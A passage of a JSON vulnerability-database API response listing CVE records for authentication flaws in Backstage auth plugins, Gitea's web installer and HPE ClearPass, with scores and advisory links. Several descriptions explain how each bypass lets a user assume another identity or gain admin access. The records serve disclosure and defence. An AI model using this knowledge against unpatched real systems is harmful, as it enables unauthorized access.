0-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101023","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-101023","note":"authoritative record"}]},{"id":"d34644fe-cc1f-4714-9e5d-951b8ea90edb","slug":"cve-2026-106488","externalId":"CVE-2026-106488","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106488 — Backstage is an open framework for building developer portals.","description":"Backstage is an open framework for building developer portals. Prior to 0.4.20, the @backstage/plugin-auth-backend-module-oidc-provider package is affected by improper authentication in the oidc provider. Deployments using OIDC email-based identity resolution with a provider that permits unverified email addresses may allow an authenticated provider user to assume another catalog identity. This may grant access and permissions associated with that user. No direct availability impact is demonstrated. This issue is fixed in version 0.4.20.","cveId":"CVE-2026-106488","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","severity":"high","vendor":"npm","product":"@backstage/plugin-auth-backend-module-oidc-provider","affectedVersions":["pkg:npm/%40backstage/plugin-auth-backend-module-oidc-provider < 0.4.20"],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-826h-28h9-65hg","ecosystem:npm","status:undergoing-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/backstage/backstage/commit/1b1f05e82161aaabc226c1d7d498d746956bf942","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/backstage/backstage/releases/tag/v1.54.6","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-826h-28h9-65hg","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-826h-28h9-65hg","type":"advisory","title":"OSV GHSA-826h-28h9-65hg"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106488","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/backstage/backstage","type":"vendor","title":"OSV package"}],"epssScore":0.0028,"epssPercentile":0.18769,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T21:17:17.623Z","addedAt":"2026-10-06T22:39:33.002Z","updatedAt":"2026-10-07T20:39:39.933Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106488","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106488","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-826H-28H9-65HG"}]},{"id":"2bc418cf-202e-4c31-b81d-1b84c2bc73d3","slug":"cve-2026-106460","externalId":"CVE-2026-106460","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106460 — Backstage is an open framework for building developer portals.","description":"Backstage is an open framework for building developer portals. From 0.3.0 until 0.6.15 and 0.7.5, the @backstage/plugin-auth-node package did not consistently honor explicit negative email verification during shared OAuth profile normalization. The affected paths include a selected profile email marked verified: false, a matching raw provider email marked email_verified: false, and an email obtained only from an ID token marked email_verified: false. Exploitation requires an admitted identity-provider user who can supply or change an unverified email and a deployment that uses the selected profile email to resolve catalog identities. The verification metadata must apply to the selected email; an absent email_verified claim alone is not affected. In an affected configuration, the user may assume another catalog identity and obtain its associated access and permissions. This issue is fixed in versions 0.6.15 and 0.7.5.","cveId":"CVE-2026-106460","cvssScore":6.8,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N","severity":"medium","vendor":"npm","product":"@backstage/plugin-auth-node","affectedVersions":["pkg:npm/%40backstage/plugin-auth-node >= 0.3.0, < 0.6.15","pkg:npm/%40backstage/plugin-auth-node >= 0.7.0, < 0.7.5"],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-xm5q-p7w3-x6cp","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/backstage/backstage/commit/507e65ab9160aae6b602513dbfaebdd6be0ca8bb","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/commit/f0a43dacd1b501064da042b43eab9c1e06371d38","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/commit/fc5e30aba8ea7282ed3658c3b985cec71051cf9d","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/releases/tag/v1.49.7","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/releases/tag/v1.54.7","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-xm5q-p7w3-x6cp","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-xm5q-p7w3-x6cp","type":"advisory","title":"OSV GHSA-xm5q-p7w3-x6cp"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106460","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/backstage/backstage","type":"vendor","title":"OSV package"}],"epssScore":0.00313,"epssPercentile":0.22265,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T21:17:16.707Z","addedAt":"2026-10-06T22:39:32.957Z","updatedAt":"2026-10-08T00:42:49.837Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106460","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106460","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-XM5Q-P7W3-X6CP"}]},{"id":"e06b2340-042d-4d5a-a818-4488c7312d17","slug":"cve-2026-106457","externalId":"CVE-2026-106457","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106457 — Backstage is an open framework for building developer portals.","description":"Backstage is an open framework for building developer portals. From 0.1.0 until 0.5.0, the @backstage/plugin-auth-backend-module-cloudflare-access-provider package is affected by insufficient audience validation in the cloudflare access auth provider. The Cloudflare Access auth provider verifies a token's signature and team issuer, but affected versions do not verify that the token was issued for the Backstage application. A user holding a valid token for another Access application in the same Cloudflare Zero Trust team may therefore be able to authenticate to Backstage if that token reaches the auth endpoint without the Backstage application's audience already being enforced upstream. Cloudflare Access normally evaluates the protected application before forwarding requests. This issue is fixed in version 0.5.0.","cveId":"CVE-2026-106457","cvssScore":6.8,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N","severity":"medium","vendor":"npm","product":"@backstage/plugin-auth-backend-module-cloudflare-access-provider","affectedVersions":["pkg:npm/%40backstage/plugin-auth-backend-module-cloudflare-access-provider >= 0.1.0, < 0.5.0"],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-q333-f498-w2x7","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/backstage/backstage/commit/ed9034cacd9def3b3674f0a764fe992f751e204d","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/releases/tag/v1.55.0","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-q333-f498-w2x7","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-q333-f498-w2x7","type":"advisory","title":"OSV GHSA-q333-f498-w2x7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106457","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/backstage/backstage","type":"vendor","title":"OSV package"}],"epssScore":0.00277,"epssPercentile":0.1851,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T21:17:16.083Z","addedAt":"2026-10-06T22:39:32.934Z","updatedAt":"2026-10-08T00:42:49.882Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106457","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106457","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-Q333-F498-W2X7"}]},{"id":"41553a18-ead9-4e51-a8c6-7491fff8ec81","slug":"cve-2026-96404","externalId":"CVE-2026-96404","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-96404 — When Gitea's web installer is reachable against a database that already contains users, such as after `INSTALL_LOCK` has been reset to `false`, sub…","description":"When Gitea's web installer is reachable against a database that already contains users, such as after `INSTALL_LOCK` has been reset to `false`, submitting the install form with an administrator username matching an existing account issued an authenticated session for that account without verifying its password. If the account is an administrator, the session grants full administrative access, including changing the account's password. Databases with a single user also did not require the reinstall confirmation.","cveId":"CVE-2026-96404","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.gitea.com/release-of-28.0.0/","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/pull/39400","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/releases/tag/v28.0.0","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/security/advisories/GHSA-9h7g-h754-c8x2","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"}],"epssScore":0.00413,"epssPercentile":0.33531,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T20:17:35.500Z","addedAt":"2026-10-06T20:39:33.516Z","updatedAt":"2026-10-07T16:39:31.158Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-96404","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-96404","note":"authoritative record"}]},{"id":"43461b16-dd1e-45ad-85fa-916606169ef1","slug":"cve-2026-79796","externalId":"CVE-2026-79796","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-79796 — Vulnerabilities have been identified in the affected interface of ClearPass Policy Manager that could potentially allow an unauthenticated remote a…","description":"Vulnerabilities have been identified in the affected interface of ClearPass Policy Manager that could potentially allow an unauthenticated remote attacker to circumvent existing authentication controls. Successful exploitation could allow an attacker to gain unauthorized access to the affected system.","cveId":"CVE-2026-79796","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05158en_us&docLocale=en_US","type":"advisory","title":"security-alert@hpe.com"}],"epssScore":0.00465,"epssPercentile":0.38302,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T20:17:31.083Z","addedAt":"2026-10-06T20:39:33.286Z","updatedAt":"2026-10-08T04:39:32.440Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-79796","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-79796","note":"authoritative record"}]},{"id":"7460ecd1-0500-480b-b68e-57cd06e5e958","slug":"cve-2026-76752","externalId":"CVE-2026-76752","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-76752 — Authentication bypass vulnerabilities exist in the web-based management and API interfaces of HPE Networking ClearPass Policy Manager.","description":"Authentication bypass vulnerabilities exist in the web-based management and API interfaces of HPE Networking ClearPass Policy Manager. Successful exploitation could allow an unauthenticated remote attacker to circumvent existing authentication controls and gain administrative access to the affected system.","cveId":"CVE-2026-76752","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05158en_us&docLocale=en_US","type":"advisory","title":"security-alert@hpe.com"}],"epssScore":0.0047,"epssPercentile":0.38667,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T20:17:30.623Z","addedAt":"2026-10-06T20:39:33.255Z","updatedAt":"2026-10-08T04:39:32.410Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-76752","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-76752","note":"authoritative record"}]}],"pagination":{"page":1,"limit":20,"total":877,"totalPages":44,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:17:45.046Z","durationMs":26,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-287"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}